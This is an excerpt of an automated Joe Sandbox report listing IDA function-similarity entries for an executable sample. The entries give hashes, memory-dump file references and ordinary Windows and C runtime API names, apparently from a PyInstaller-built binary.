                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                                        • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                                                                                                        • Instruction ID: bbe89f6377486ddb835e3b164c8dda79f18224af875dd38484ef08f2c7db0ed2
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7CF06D61B09B1691EA108F28E89577A6321FF897A1F940375DF6EC62E4EF2CD489C300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7aceca4c67f259a8ea055f5cda5efb5388b7b723a3c09b52805fce967372f75b
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA118F26E5CB2311FA64116EECB237D1250AF593A0E0706B4FF6ED63DAAF6CA9414300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB3AF
                                                                                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB3CE
                                                                                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB3F6
                                                                                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB407
                                                                                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB418
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5107153a3523f70bccd5f3a3d828954c4bae41eeb6ba1abaea3632cffcdc22a4
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30116320F0CE4281FA589B6D96512796143AF447B0FD853B4EF7DC66D6DE2CF8418300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 9aa9ffdd5bc88ab497d3b89d8a464cfdb7345b19c087d9fb5c3e39bcf37f5cbd
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F110920F0CE0786F968AA6D695117E11434F85770F9857B8DF3ECA6D2DD2DB8419311
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID: verbose
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                                                                                        • Instruction ID: f311c9e24136a87dee3d19148c0fc7a5b38b122ddf6625ef5a4b908f65c372a8
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15919A32A09E4681FB658E29D45037E76A6AB40B94F844276DF5EC73E7DF3CE8858301
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1ba2870bf5cba99e8c96209f0761cb7b2f28a72f8d294bf50bcb638b8548fbcd
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1181AF72E08A4385F7649F2D815027827A2AB11B48FD5A2B9CF09D72D9CF3EE949D301
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                                                        • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                                                                                                        • Instruction ID: e3afcafc8bb1c0cd91d7c4ac4f652bd2a6c99ed13ec28fbad4727f73886df184
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01517A26A196628ADF188F19E444B7C63A6EB44BD8F108175EF4EC7788EF7DE841C700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                                                                                                        • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                                                                                        • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2a3570806b04aeab73f2e69d670d3739fe0c39ef30192ff4d76e1e99d8ce88e9
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C518E32A086A28AEF748B29D04526C77A2EB54B84F1481B6EF8DC7BD5CF3DE454C701
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6c9147d962ba8ae164ee0ea4d38bc82be3823770e0fbe3674d08b2fc712afde7
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF617F32908BD586EB709B19E4403AEB7A1FB85B94F144265EF9C83B99DF7CD194CB00
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,?,00007FF6BA3A352C,?,00000000,00007FF6BA3A3F23), ref: 00007FF6BA3A7F32
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CreateDirectory
                                                                                                                                                                                                                                                                                                                        • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                                                                                        • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                                                                                                        • Instruction ID: f29f0fb67ac1866a42dd6160b06a30ee706c458277aba1d7a05b8fdeca8e2c85
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0531C221619AD545EF219B29E8507AE639AEF84BE0F440271EF6DC7BC9EF3CD6418700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                                                                                                                        • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                                                                                                        • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3242eb4e7a23a38344cd68c91a2b22a657e0197ac3394b977aafa74767134204
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC21A172B08B5182E7109B59F8847EA73A5FB88780F404136EF8DD7666EE3CD245C740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2718003287-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0ef953d58a3e27de98cccb82c67664fab58bd63d88ef1e527bfa9560445a74cb
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21D11672B18A8189E721CF79D4402AC77B2FB59798B884276DF5ED7B99DE38D406C300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 4170891091-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 139b0b010e53845ffc32afde63b358dd77c2607c0f7643788c5621ac30eed665
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C51D272F04A118BEB18CF6C99556BC27A2AB44369F901375DF1ED2AE5DF39E406C700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2780335769-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
